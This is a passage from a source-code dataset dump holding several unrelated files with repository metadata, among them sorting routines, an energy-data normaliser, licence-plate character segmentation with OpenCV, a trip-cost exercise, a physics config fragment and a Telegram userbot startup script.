if os.path.exists(self._release_file_path):
os.remove(self._release_file_path)
def copy_dirs(self):
for d in self.DIRS_TO_ARCHIVE:
copy_tree(os.path.join(self.app_dir, d), os.path.join(self._tmp_app_dir, d))
def copy_splunk_readme(self, dest_file='README.md'):
shutil.copyfile(self._readme_splunkbase_path, os.path.join(self._tmp_app_dir, dest_file))
def copy_license(self):
shutil.copyfile(self._license_path, os.path.join(self._tmp_app_dir, self.LICENSE))
def _remove_tmp_app_dir(self):
if os.path.isdir(self._tmp_app_dir):
shutil.rmtree(self._tmp_app_dir)
def _create_tmp_app_dir(self):
if not os.path.isdir(self._tmp_app_dir):
os.makedirs(self._tmp_app_dir)
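# Hedged usage sketch (editor's addition). The releaser is a callable object:
# constructing it with the app's root directory and invoking it runs the full
# prepare -> copy -> archive pipeline. '/path/to/app' is a placeholder; the
# call itself performs real filesystem and tar operations, so it is left
# commented out here.
if __name__ == "__main__":
    releaser = SplunkbaseReleaser('/path/to/app')  # hypothetical app checkout
    # releaser()  # would write release/amp4e_events_input.spl under the app dir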
| 34.71
| 109
| 0.645923
| 3,375
| 0.972342
| 0
| 0
| 638
| 0.183809
| 0
| 0
| 428
| 0.123307
|
8ba46c9ce685361335be0d77dfae9a2dd018991f
| 2,502
|
py
|
Python
|
sorts.py
|
zhangxl97/leetcode
|
aa94228eba86d761ce5c9b6bfb8b2015c1629074
|
[
"MIT"
] | 1
|
2020-09-12T10:35:22.000Z
|
2020-09-12T10:35:22.000Z
|
sorts.py
|
zhangxl97/leetcode
|
aa94228eba86d761ce5c9b6bfb8b2015c1629074
|
[
"MIT"
] | null | null | null |
sorts.py
|
zhangxl97/leetcode
|
aa94228eba86d761ce5c9b6bfb8b2015c1629074
|
[
"MIT"
] | null | null | null |
from typing import List
class sort:
def quick(self, nums:List[int]) -> List[int]:
if len(nums) >= 2:
            base = nums[-1]  # choose the pivot value (any element would do)
left, right = [], []
nums = nums[:-1]
for num in nums:
                if num >= base:  # values >= the pivot go into right
                    right.append(num)
                else:  # values < the pivot go into left
                    left.append(num)
# print(left, '\t', base, '\t', right)
return self.quick(left) + [base] + self.quick(right)
else:
return nums
def quick_sort(self, nums: list, left: int, right: int) -> None:
if left < right:
i = left
j = right
            # take the first element as the pivot
pivot = nums[left]
while i != j:
                # alternately scan from both ends and swap
                # scan right-to-left for the first element smaller than the pivot and swap it
while j > i and nums[j] > pivot:
j -= 1
if j > i:
                    # if found, move it into the hole at position i
# nums[i], nums[j] = nums[j], nums[i]
# break
nums[i] = nums[j]
i += 1
                # scan left-to-right for the first element larger than the pivot and swap it
while i < j and nums[i] < pivot:
i += 1
if i < j:
nums[j] = nums[i]
j -= 1
            # one pass of quicksort is done: the pivot's final position is i (i == j here)
nums[i] = pivot
            print(nums)  # debug trace showing the array after each partition pass
            # recursively sort the sub-sequences on either side of the pivot
self.quick_sort(nums, left, j-1)
self.quick_sort(nums, j+1, right)
def merge(self, a, b):
c = []
h = j = 0
while j < len(a) and h < len(b):
if a[j] < b[h]:
c.append(a[j])
j += 1
else:
c.append(b[h])
h += 1
if j == len(a):
for i in b[h:]:
c.append(i)
else:
for i in a[j:]:
c.append(i)
return c
def merge_sort(self, lists):
if len(lists) <= 1:
return lists
middle = len(lists)//2
left = self.merge_sort(lists[:middle])
right = self.merge_sort(lists[middle:])
return self.merge(left, right)
def main():
s = sort()
array = [2,3,5,1,1,4,6,15]
# array = [4,1,2,3,5]
print(array)
# print(s.merge_sort(array))
s.quick_sort(array, 0, len(array)-1)
print(array)
if __name__ == "__main__":
main()
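# Hedged check (editor's addition): quick() and merge_sort() both return new
# sorted lists, so each can be compared against Python's built-in sorted().
_s = sort()
_data = [5, 2, 9, 1, 5, 6]
assert _s.quick(_data) == sorted(_data)
assert _s.merge_sort(_data) == sorted(_data)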
| 26.617021
| 68
| 0.406475
| 2,536
| 0.903778
| 0
| 0
| 0
| 0
| 0
| 0
| 632
| 0.225232
|
8ba6b11d7fb6854358fc0d437c22f1ff827b55c0
| 6,622
|
py
|
Python
|
energy_consumption_lstm/data/model.py
|
DiarmuidKelly/predictors
|
9087302ab3cc54463807b0777f341b575a8fcc90
|
[
"MIT"
] | null | null | null |
energy_consumption_lstm/data/model.py
|
DiarmuidKelly/predictors
|
9087302ab3cc54463807b0777f341b575a8fcc90
|
[
"MIT"
] | null | null | null |
energy_consumption_lstm/data/model.py
|
DiarmuidKelly/predictors
|
9087302ab3cc54463807b0777f341b575a8fcc90
|
[
"MIT"
] | null | null | null |
import datetime as dt
import numpy as np
def calculate_ranges(dataset):
arr = np.array(dataset)
mean = np.mean(arr, axis=0)
min = np.min(arr, axis=0)
max = np.max(arr, axis=0)
ranges = np.array((min, mean, max)).T
return ranges
class Record:
def __init__(self):
self.time_date = 0
self.global_active_Ah_min = 0
self.global_reactive_Ah_min = 0
self.voltage = 0
self.current = 0
self.sub_meters = []
self.residual_active_energy = 0
self.error_active = 0
self.power = 0
self.raw_power = 0
def process_entry(self, arr):
ret = [self.__date_time_timestamp(arr[0], arr[1])]
if arr[2] == '?':
return False
# global active power in kilowatts to Amps to Ah
ret.append(self.__convert_watts_to_amps(float(arr[2]) * (1000 / 60), float(arr[4])))
# global reactive power in kilowatts to Amps to Ah
ret.append(self.__convert_watts_to_amps(float(arr[3]) * (1000 / 60), float(arr[4])))
# volts
ret.append(float(arr[4]))
# amps
ret.append(float(arr[5]))
# Sub meters from watt hours to Amp hours
ret.append(self.__convert_Wh_to_Ah(float(arr[6]), float(arr[4])))
ret.append(self.__convert_Wh_to_Ah(float(arr[7]), float(arr[4])))
ret.append(self.__convert_Wh_to_Ah(float(arr[8]), float(arr[4])))
# Active power in Ah not measured by the sub meters
ret.append((ret[1]) - (ret[5] + ret[6] + ret[7]))
# Power in Ah difference between volts * current and global active power
# (volts * amps) - global active kilowatts * 1000
# / volts
ret.append(self.__convert_watts_to_amps((float(arr[4]) * float(arr[5])) - (float(arr[2]) * 1000), float(arr[4])))
ret.append(float(arr[4]) * float(arr[5]))
return ret
def __calc_phase_from_real(self):
self.__convert_amps_to_watts(self.global_active_Ah_min, self.voltage)
def process_record(self, rec, ranges):
# self.time_date = self.__date_time_vector(rec[0], ranges[0])
self.time_date = rec[0]
self.global_active_Ah_min = self.__global_active_Ah_vector(rec[1], ranges[1])
self.global_reactive_Ah_min = self.__global_reactive_Ah_vector(rec[2], ranges[2])
self.voltage = self.__voltage_vector(rec[3], ranges[3])
self.current = self.__current_vector(rec[4], ranges[4])
self.sub_meters = self.__sub_meter_vector([rec[5], rec[6], rec[7]], [ranges[5], ranges[6], ranges[7]])
self.residual_active_energy = self.__residual_active_energy_vector(rec[8], ranges[8])
self.error_active = self.__error_active_vector(rec[9], ranges[9])
self.power = self.__power_vector(rec[10], ranges[10])
self.raw_power = rec[10]
def __date_time_timestamp(self, date, time):
date = date.split("/")
date = dt.date(int(date[2]), int(date[1]), int(date[0])).isoformat()
date = dt.datetime.fromisoformat("{}T{}".format(date, time))
return date.timestamp() # 100,000 records processed in 0.4 seconds
def __date_time_vector(self, val, time_date_range):
if time_date_range[0] > val or val > time_date_range[2]:
raise Exception("Value out of range")
val = (val - time_date_range[0]) / (time_date_range[2] - time_date_range[0])
return abs(val)
def __global_active_Ah_vector(self, val, global_active_Ah_min_range):
if global_active_Ah_min_range[0] > val or val > global_active_Ah_min_range[2]:
raise Exception("Value out of range")
val = (val - global_active_Ah_min_range[0]) / (global_active_Ah_min_range[2] - global_active_Ah_min_range[0])
return abs(val)
def __global_reactive_Ah_vector(self, val, global_reactive_Ah_min_range):
if global_reactive_Ah_min_range[0] > val or val > global_reactive_Ah_min_range[2]:
raise Exception("Value out of range")
val = (val - global_reactive_Ah_min_range[0]) / (global_reactive_Ah_min_range[2] - global_reactive_Ah_min_range[0])
return abs(val)
def __voltage_vector(self, val, voltage_range):
if voltage_range[0] > val or val > voltage_range[2]:
raise Exception("Value out of range")
val = (val - voltage_range[0]) / (voltage_range[2] - voltage_range[0])
return abs(val)
def __current_vector(self, val, current_range):
if current_range[0] > val or val > current_range[2]:
raise Exception("Value out of range")
val = (val - current_range[0]) / (current_range[2] - current_range[0])
return abs(val)
def __sub_meter_vector(self, vals, sub_meters_range):
if sub_meters_range[0][0] > vals[0] or vals[0] > sub_meters_range[0][2]:
raise Exception("Value out of range")
vals[0] = (vals[0] - sub_meters_range[0][0]) / (sub_meters_range[0][2] - sub_meters_range[0][0])
if sub_meters_range[1][0] > vals[1] or vals[1] > sub_meters_range[1][2]:
raise Exception("Value out of range")
vals[1] = (vals[1] - sub_meters_range[1][0]) / (sub_meters_range[1][2] - sub_meters_range[1][0])
if sub_meters_range[2][0] > vals[2] or vals[2] > sub_meters_range[2][2]:
raise Exception("Value out of range")
vals[2] = (vals[2] - sub_meters_range[2][0]) / (sub_meters_range[2][2] - sub_meters_range[2][0])
return vals
def __residual_active_energy_vector(self, val, residual_active_energy_range):
if residual_active_energy_range[0] > val or val > residual_active_energy_range[2]:
raise Exception("Value out of range")
val = (val - residual_active_energy_range[0]) / (residual_active_energy_range[2] - residual_active_energy_range[0])
return abs(val)
def __error_active_vector(self, val, error_active_range):
if error_active_range[0] > val or val > error_active_range[2]:
raise Exception("Value out of range")
val = (val - error_active_range[0]) / (error_active_range[2] - error_active_range[0])
return abs(val)
def __power_vector(self, val, power_range):
if power_range[0] > val or val > power_range[2]:
raise Exception("Value out of range")
val = (val - power_range[0]) / (power_range[2] - power_range[0])
return abs(val)
def __convert_watts_to_amps(self, watts, volts):
return watts / volts
def __convert_amps_to_watts(self, amps, volts):
return amps * volts
def __convert_Wh_to_Ah(self, wh, volts):
return wh / volts
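# Hedged usage sketch (editor's addition). The field layout assumed here
# matches the UCI "Individual household electric power consumption" dataset
# (date, time, global active/reactive power, voltage, intensity, three sub
# meters); that layout is inferred from the conversions above, not stated in
# the file itself.
if __name__ == "__main__":
    row = ["16/12/2006", "17:24:00", "4.216", "0.418", "234.840",
           "18.400", "0.000", "1.000", "17.000"]
    rec = Record().process_entry(row)
    print(rec[0], rec[1])  # timestamp and global active energy in Ah/min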
| 43.854305
| 123
| 0.643914
| 6,361
| 0.960586
| 0
| 0
| 0
| 0
| 0
| 0
| 669
| 0.101027
|
8ba7da6d41b49d8a498bec0f19c0c437b815e955
| 558
|
py
|
Python
|
RecoTracker/CkfPattern/python/CkfTrackCandidatesNoOverlaps_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
RecoTracker/CkfPattern/python/CkfTrackCandidatesNoOverlaps_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
RecoTracker/CkfPattern/python/CkfTrackCandidatesNoOverlaps_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
# TrackerTrajectoryBuilders
from RecoTracker.CkfPattern.CkfTrajectoryBuilder_cff import *
# TrajectoryCleaning
from TrackingTools.TrajectoryCleaning.TrajectoryCleanerBySharedHits_cfi import *
# navigation school
from RecoTracker.TkNavigation.NavigationSchoolESProducer_cff import *
from RecoTracker.CkfPattern.CkfTrackCandidates_cfi import *
# generate CTF track candidates ############
ckfTrackCandidatesNoOverlaps = ckfTrackCandidates.clone(
TrajectoryBuilderPSet = dict(refToPSet_ = 'CkfTrajectoryBuilder')
)
| 39.857143
| 80
| 0.844086
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 132
| 0.236559
|
8ba816e0011648c0f031c8c0072d0e07ef644345
| 3,639
|
py
|
Python
|
python ex12.py
|
IMDCGP105-1819/portfolio-s184286
|
e5485f640f341090823bbcaabe287376a048b2c4
|
[
"MIT"
] | null | null | null |
python ex12.py
|
IMDCGP105-1819/portfolio-s184286
|
e5485f640f341090823bbcaabe287376a048b2c4
|
[
"MIT"
] | null | null | null |
python ex12.py
|
IMDCGP105-1819/portfolio-s184286
|
e5485f640f341090823bbcaabe287376a048b2c4
|
[
"MIT"
] | null | null | null |
"""
Task 3
Write an application that allows you to calculate the cost of a trip.
Implement a function called hotel_cost that takes one argument, nights, as input. The hotel costs
£70 per night – so return a suitable value.
Implement a function called plane_ticket_cost that accepts a string, city, and a float, class, as inputs.
The function should handle the following locations, returning their associated round trip costs that
are multiplied by the class amount.
“New York”: £2,000
“Auckland”: £790
“Venice”: £154
“Glasgow”: £65
The class multiplier starts at 1 for economy and goes up in .3 steps: 1.3 = premium economy, 1.6 =
business class and 1.9 = first class.
Then implement the rental_car_cost function with an argument called days. The function should
calculate the cost of hiring a car with the following considerations:
• Every day of car hire costs £30
• If you rent the car for more than 7 days, you get £50 off your total
• If you rent the car for more than 3 days, you get £30 off your total
  o These two discounts cannot be applied at the same time.
Define a function total_cost which accepts two arguments; city and days. It should call the other
functions and return the sum of the cost of the trip.
Save the file as the next numeric ex value and commit to GitHub.
"""
nights = int(input("how many nights stay? "))

def hotel_cost(nights):
    # the hotel costs £70 per night
    return nights * 70

print("number of nights:", nights)

city = str(input("select your destination: New York, Auckland, Venice, Glasgow: "))

def plane_ticket_cost(city, _class):
    # the function handles the following locations, returning their associated
    # round trip costs multiplied by the class amount
    fares = {"New York": 2000.00, "Auckland": 790.00,
             "Venice": 154.00, "Glasgow": 65.00}
    return fares[city] * _class

# the class multiplier starts at 1 for economy and goes up in .3 steps:
# 1.3 = premium economy, 1.6 = business class, 1.9 = first class
_class = float(input("Select your Travel Class: 1=Economy, 1.3=Premium Economy, "
                     "1.6=Business Class, 1.9=First Class: "))
class_names = {1.0: "Economy", 1.3: "Premium Economy",
               1.6: "Business Class", 1.9: "First Class"}
print(class_names.get(_class, "Unknown"), "Travel Class selected")

days = float(input("enter how many days of car hire are required: "))

def rental_car_cost(days):  # every day of car hire costs £30
    cost = days * 30
    # the two discounts cannot be applied at the same time, so test the
    # larger threshold first
    if days > 7:
        cost -= 50.00  # more than 7 days of hire: £50 off the total
    elif days > 3:
        cost -= 30.00  # more than 3 days of hire: £30 off the total
    return cost

def total_cost(city, days):  # accepts two arguments, city and days
    # it calls the other functions and returns the sum of the cost of the trip
    hotel = hotel_cost(nights)
    ticket = plane_ticket_cost(city, _class)
    car = rental_car_cost(days)
    print("the Hotel Cost is:", hotel)
    print("the Plane Ticket Cost:", ticket)
    print("Rental Car Cost:", car)
    print("Choice of city:", city)
    print("for", days, "days of car hire")
    print("Travelling in", class_names.get(_class, "Unknown"), "class")
    return hotel + ticket + car

print("Total cost of the trip:", total_cost(city, days))
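# Worked example (editor's addition): with nights = 4 and _class = 1.0,
# a trip to Glasgow with 5 days of car hire costs
#   hotel_cost(4) = 4 * 70 = 280
#   plane_ticket_cost("Glasgow", 1.0) = 65 * 1.0 = 65
#   rental_car_cost(5) = 5 * 30 - 30 = 120
# so total_cost("Glasgow", 5) returns 280 + 65 + 120 = 465.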
| 34.657143
| 183
| 0.687826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,575
| 0.700871
|
8ba86635b84461a1f0a395b2d0b3f48cfc499bf5
| 7,050
|
py
|
Python
|
segment_chars.py
|
indranildchandra/Automatic-Licence-Plate-Recognizer
|
12abcf40459f8e2d5d7491aedaed2ee3ea1eb1a7
|
[
"Apache-2.0"
] | 1
|
2020-10-12T12:49:05.000Z
|
2020-10-12T12:49:05.000Z
|
segment_chars.py
|
indranildchandra/Automatic-Licence-Plate-Recognizer
|
12abcf40459f8e2d5d7491aedaed2ee3ea1eb1a7
|
[
"Apache-2.0"
] | null | null | null |
segment_chars.py
|
indranildchandra/Automatic-Licence-Plate-Recognizer
|
12abcf40459f8e2d5d7491aedaed2ee3ea1eb1a7
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
import numpy as np
import cv2
import os
import math
import pickle
from matplotlib import pyplot as plt
from PIL import Image
from matplotlib.pyplot import imshow
# %matplotlib inline
def rotate_image(img):
# gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
gray = img
edges = cv2.Canny(gray,50,150,apertureSize = 3)
lines = cv2.HoughLines(edges,1,np.pi/180,200)
angle = 0
if lines is not None:
for rho,theta in lines[0]:
angle = math.degrees(theta)-90
a = np.cos(theta)
b = np.sin(theta)
x0 = a*rho
y0 = b*rho
x1 = int(x0 + 1000*(-b))
y1 = int(y0 + 1000*(a))
x2 = int(x0 - 1000*(-b))
y2 = int(y0 - 1000*(a))
# print(angle)
    # Do skew correction only if the angle of rotation is greater than 3 degrees
if abs(angle%90) > 3:
if angle < 0:
angle = -1* angle
if angle > 45:
angle = 90-angle
(h, w) = img.shape[:2]
center = (w // 2, h // 2)
M = cv2.getRotationMatrix2D(center, angle, 1.0)
rotated = cv2.warpAffine(img, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)
# cv2.putText(rotated, "Angle: {:.2f} degrees".format(angle), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
# print("Image rotated by angle: {:.3f}".format(angle))
return rotated
else:
return img
def square(img):
"""
    Resize a non-square image to a square one (height == width) by zero-padding.
:param img: input image as numpy array
:return: numpy array
"""
# image after making height equal to width
squared_image = img
# Get image height and width
h = img.shape[0]
w = img.shape[1]
    # If the height is greater than the width, pad zero columns on both sides
if h > w:
diff = h-w
if diff % 2 == 0:
x1 = np.zeros(shape=(h, diff//2))
x2 = x1
else:
x1 = np.zeros(shape=(h, diff//2))
x2 = np.zeros(shape=(h, (diff//2)+1))
squared_image = np.concatenate((x1, img, x2), axis=1)
    # If the height is less than the width, pad zero rows on top and bottom
if h < w:
diff = w-h
if diff % 2 == 0:
x1 = np.zeros(shape=(diff//2, w))
x2 = x1
else:
x1 = np.zeros(shape=(diff//2, w))
x2 = np.zeros(shape=((diff//2)+1, w))
squared_image = np.concatenate((x1, img, x2), axis=0)
return squared_image
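# Hedged sanity check for square() (editor's addition): a 2x4 input gets one
# zero row concatenated above and below, giving a 4x4 result.
assert square(np.ones((2, 4))).shape == (4, 4)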
def get_segmented_chars(img_file_path, annotation):
img = cv2.imread(img_file_path)
# imshow(img)
img = img[round(img.shape[0]*0.1):round(img.shape[0]*0.9), round(img.shape[1]*0.1):round(img.shape[1]*0.9)]
# imshow(img)
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# imshow(imgray)
imgray = rotate_image(imgray)
# imshow(imgray)
kernel = np.ones((8,8), np.uint8)
eroded_img = cv2.erode(imgray, kernel, iterations=1)
# imshow(eroded_img)
imgray = eroded_img
height = img.shape[0]
width = img.shape[1]
area = height * width
scale1 = 0.001 # static value
scale2 = 0.1 # static value
area_condition1 = area * scale1
area_condition2 = area * scale2
# # Global Thresholding
# ret1,th1 = cv2.threshold(imgray,127,255,cv2.THRESH_BINARY)
# # Otsu's Thresholding
# ret2,th2 = cv2.threshold(imgray,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
# # Adaptive Mean Thresholding
# th4 = cv2.adaptiveThreshold(imgray,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,11,2)
# # Adaptive Gaussian Thresholding
# th5 = cv2.adaptiveThreshold(imgray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)
# Otsu's thresholding after Gaussian filtering
blur = cv2.GaussianBlur(imgray,(5,5),0)
ret3,th3 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
# titles = ['Original Grayscale Image', 'Global Thresholding', 'Otsu thresholding', 'Otsu thresholding after Gaussian filtering',
# 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding']
# images = [imgray, th1, th2, th3, th4, th5]
# for i in range(6):
# plt.subplot(3,2,i+1),plt.imshow(images[i],'gray')
# plt.title(titles[i])
# plt.xticks([]),plt.yticks([])
# plt.show()
# get contours
contours, hierarchy = cv2.findContours(th3, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# sort contours
contours = sorted(contours, key=cv2.contourArea, reverse=True)
# filter contours
final_contours = []
aspect_ratio_filtered_contours = []
aspect_ratio_filtered_contours_area = []
area_filtered_contours = []
area_filtered_contours_centroids = []
for cnt in contours:
(x,y,w,h) = cv2.boundingRect(cnt)
if (w * h > area_condition1 and w * h < area_condition2 and (w/h > 0.3 or h/w > 0.3)):
aspect_ratio_filtered_contours.append(cnt)
aspect_ratio_filtered_contours_area.append(w * h)
if aspect_ratio_filtered_contours_area:
max_cnt_area = max(aspect_ratio_filtered_contours_area)
counter = 1
for cnt, cnt_area in zip(aspect_ratio_filtered_contours, aspect_ratio_filtered_contours_area):
if cnt_area >= 0.3 * max_cnt_area:
area_filtered_contours.append(cnt)
cnt_moment = cv2.moments(cnt)
area_filtered_contours_centroids.append((counter, int(cnt_moment['m10']/cnt_moment['m00']), int(cnt_moment['m01']/cnt_moment['m00'])))
counter += 1
if len(area_filtered_contours) > len(annotation):
area_filtered_contours_centroids.sort(key = lambda x: x[2], reverse=True)
# print(area_filtered_contours_centroids)
centroid_means = [sum(ele) / len(area_filtered_contours_centroids) for ele in zip(*area_filtered_contours_centroids)]
# print(centroid_means)
centroid_mean_distance = list()
for ele in area_filtered_contours_centroids:
centroid_mean_distance.append((ele[0], ele[1], ele[2], abs(math.sqrt((ele[1] - centroid_means[1])**2 + (ele[2] - centroid_means[2])**2))))
centroid_mean_distance.sort(key = lambda x: x[3], reverse=False)
# print(centroid_mean_distance)
counter = 1
for cnt, cnt_centroid_mean_dist in zip(area_filtered_contours, centroid_mean_distance):
if counter <= 7:
final_contours.append(cnt)
counter += 1
else:
break
else:
final_contours = area_filtered_contours
# final_contours = area_filtered_contours
cropped_chars = []
bounding_boxes = []
for cnt in final_contours:
(x,y,w,h) = cv2.boundingRect(cnt)
cv2.drawContours(img, [cnt], 0, (0, 255, 0), 3)
cv2.rectangle(img, (x,y), (x+w,y+h), (255, 0, 0), 2)
c = th3[y:y+h,x:x+w]
c = np.array(c)
c = cv2.bitwise_not(c)
c = square(c)
c = cv2.resize(c,(28,28), interpolation = cv2.INTER_AREA)
cropped_chars.append(c)
bounding_boxes.append((x,y,w,h))
# sort shortlisted contours from left to right
if cropped_chars:
a = list(map(tuple, zip(cropped_chars, final_contours, bounding_boxes)))
sorted_cropped_chars, sorted_final_contours, sorted_bounding_boxes = zip(*sorted(a, key = lambda x: x[2][0], reverse=False))
else:
sorted_cropped_chars = []
sorted_final_contours = []
sorted_bounding_boxes = []
# fig, axes = plt.subplots(3, 3, sharex=True, sharey=True)
# for cropped_char, ax in zip(sorted_cropped_chars, axes.flat):
# ax.imshow(cropped_char)
# ax.axis('off')
for index, cnt in enumerate(sorted_final_contours):
(x,y,w,h) = cv2.boundingRect(cnt)
img = cv2.putText(img, str(annotation[index]).upper(), (x, y-10), cv2.FONT_HERSHEY_SIMPLEX, 1, (50,50,50), 2) # green - (36,255,12)
return sorted_cropped_chars, img
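# Hedged usage sketch (editor's addition). 'plate.jpg' and the annotation
# string are hypothetical placeholders; the function returns 28x28 character
# crops sorted left-to-right plus the annotated plate image.
if __name__ == "__main__":
    demo = "plate.jpg"  # hypothetical input image, not shipped with the repo
    if os.path.exists(demo):
        chars, annotated = get_segmented_chars(demo, "AB12CDE")
        print("{} characters segmented".format(len(chars)))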
| 31.61435
| 141
| 0.699433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,016
| 0.285957
|
8ba8b01b1342226dbfd45e390f34ba1e3c088e34
| 123
|
py
|
Python
|
clase1/multiplicadores.py
|
Munoz-Rojas-Adriana/Computacion_para_Ingenieria
|
4f695887966a94b6c422d100c2c4ec4a94d1e80e
|
[
"Apache-2.0"
] | null | null | null |
clase1/multiplicadores.py
|
Munoz-Rojas-Adriana/Computacion_para_Ingenieria
|
4f695887966a94b6c422d100c2c4ec4a94d1e80e
|
[
"Apache-2.0"
] | null | null | null |
clase1/multiplicadores.py
|
Munoz-Rojas-Adriana/Computacion_para_Ingenieria
|
4f695887966a94b6c422d100c2c4ec4a94d1e80e
|
[
"Apache-2.0"
] | null | null | null |
multi = 1
numbers = (1, 2, 3)
for i in numbers:
    multi = multi * i
print(f'the total product of 1 to 3 is {multi}')
| 15.375
| 50
| 0.528455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.308943
|
8ba8ed599cf94b78021c68a977f2d000df6dcd16
| 2,476
|
py
|
Python
|
aiida_jutools/__init__.py
|
PhilippRue/aiida-jutools
|
66070e7077cb454bcfd70dd3327b335499556a16
|
[
"MIT"
] | 5
|
2020-12-11T13:32:09.000Z
|
2022-01-19T08:36:40.000Z
|
aiida_jutools/__init__.py
|
PhilippRue/aiida-jutools
|
66070e7077cb454bcfd70dd3327b335499556a16
|
[
"MIT"
] | 7
|
2021-01-28T10:24:13.000Z
|
2021-08-18T13:42:47.000Z
|
aiida_jutools/__init__.py
|
PhilippRue/aiida-jutools
|
66070e7077cb454bcfd70dd3327b335499556a16
|
[
"MIT"
] | 5
|
2020-12-07T17:13:38.000Z
|
2021-11-25T09:58:48.000Z
|
# -*- coding: utf-8 -*-
# pylint: disable=unused-import
###############################################################################
# Copyright (c), Forschungszentrum Jülich GmbH, IAS-1/PGI-1, Germany. #
# All rights reserved. #
# This file is part of the aiida-jutools package. #
# (AiiDA JuDFT tools) #
# #
# The code is hosted on GitHub at https://github.com/judftteam/aiida-jutools. #
# For further information on the license, see the LICENSE.txt file. #
# For further information please visit http://judft.de/. #
# #
###############################################################################
"""AiiDA JuTools.
We recommend using this library with the import statement ``import aiida_jutools as jutools``. In your code,
you can then call all available tools like so: ``jutools.package.tool()``.
"""
__version__ = "0.1.0-dev1"
# Import all of the library's user packages.
from . import code
from . import computer
from . import group
from . import io
from . import logging
from . import meta
from . import node
from . import plugins
from . import process
from . import process_functions
from . import submit
from . import structure
# Import all of the library's developer packages.
from . import _dev
# Potentially problematic imports:
# - kkr: As soon as aiida-kkr becomes dependent on aiida-jutools, this import MIGHT introduce a circular
#        dependency. A simple test (making aiida-kkr import aiida-jutools) had no such effect. But if it
# occurs, here a few potential solutions:
# - Decouple the kkr package = remove from import list above. Then all code using it must be updated
# to import it separately, like from aiida_jutools import kkr as _jutools_kkr. Might break external code.
# - Hide all aiida-kkr imports = in resp. module, move them inside the tools that use them. If it works,
# this might be a solution that does not break external code.
#
# The potential problem and the solution stated above, if it becomes one, applies to other JuDFTTeam plugins as well,
# should they start using aiida-jutools as common codebase (aiida-fleur, aiida-spirit, aiida-spex, ...).
| 51.583333
| 117
| 0.586026
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,154
| 0.8696
|
8bab05cccc2b06bc0e17af38af464fd773e79545
| 5,358
|
py
|
Python
|
beastx/__main__.py
|
Mrunal1911/Beast-X
|
b7b13b3b5db754894a830569909c4b77aa1ff19d
|
[
"MIT"
] | null | null | null |
beastx/__main__.py
|
Mrunal1911/Beast-X
|
b7b13b3b5db754894a830569909c4b77aa1ff19d
|
[
"MIT"
] | null | null | null |
beastx/__main__.py
|
Mrunal1911/Beast-X
|
b7b13b3b5db754894a830569909c4b77aa1ff19d
|
[
"MIT"
] | null | null | null |
import logging
from pathlib import Path
from sys import argv
import var
import telethon.utils
from telethon import TelegramClient
from telethon import events,Button
import os
from var import Var
from . import beast
from telethon.tl import functions
from beastx.Configs import Config
from telethon.tl.functions.messages import AddChatUserRequest
from telethon.tl.functions.users import GetFullUserRequest
from telethon.tl.functions.channels import LeaveChannelRequest
from telethon.tl.functions.account import UpdateProfileRequest
from telethon.tl.types import InputMessagesFilterDocument
from resources.startup.sanskar import autobot,autopilot,customize
from beastx.utils import load_module, start_assistant
import asyncio
from telethon.tl.functions.channels import InviteToChannelRequest
from . import bot
bot = beast
sed = logging.getLogger("beastx")
# from . import semxx, semxxx
#####################################
plugin_channel = "@BeastX_Plugins"
#####################################
if Var.TG_BOT_TOKEN_BF_HER is None:
try:
print("BOT_TOKEN not Found")
bot.loop.run_until_complete(autobot())
except BaseException as er:
print(er)
else:
pass
sur = Config.PRIVATE_GROUP_ID
UL = Config.TG_BOT_USER_NAME_BF_HER
VR = "Beast 0.1"
chat_id = sur
sed = logging.getLogger("beastx")
async def add_bot(bot_token):
await bot.start(bot_token)
bot.me = await bot.get_me()
bot.uid = telethon.utils.get_peer_id(bot.me)
#om = await beast.get_me()
#mm = await sedmrunal.get_me()
#try:
#MSG = f"""
#✨𝔹𝕖𝕒𝕤𝕥 ℍ𝕒𝕤 𝔹𝕖𝕖𝕟 𝔻𝕖𝕡𝕝𝕠𝕪𝕖𝕕!
#---------------------
#┏━━━━━━━━━━━━━━━━━
#┣•Assistant➠ @{mm.username}
#┣•User➠ @{om.username}
#┣•Version➠ {VR}
#┗━━━━━━━━━━━━━━━━━
#Do `.ping `or` /alive` for check userbot working
#"""
'''
await sedmrunal.send_message(sur, MSG,
buttons=[
[Button.url("⭐Updates", url="https://t.me/BeastX_Userbot")],
[ Button.url("⚡Support",url="https://t.me/BeastX_Support")]
])
except Exception as e:
sed.info(str(e))
sed.info("---------------------------------------")
sed.info("Bruh you forgot add assistant in log group")
sed.info("---------------------------------------")
'''
try:
bot.tgbot = None
if Var.TG_BOT_USER_NAME_BF_HER is not None:
bot.tgbot = TelegramClient(
"TG_BOT_TOKEN", api_id=Var.APP_ID, api_hash=Var.API_HASH
).start(bot_token=Var.TG_BOT_TOKEN_BF_HER)
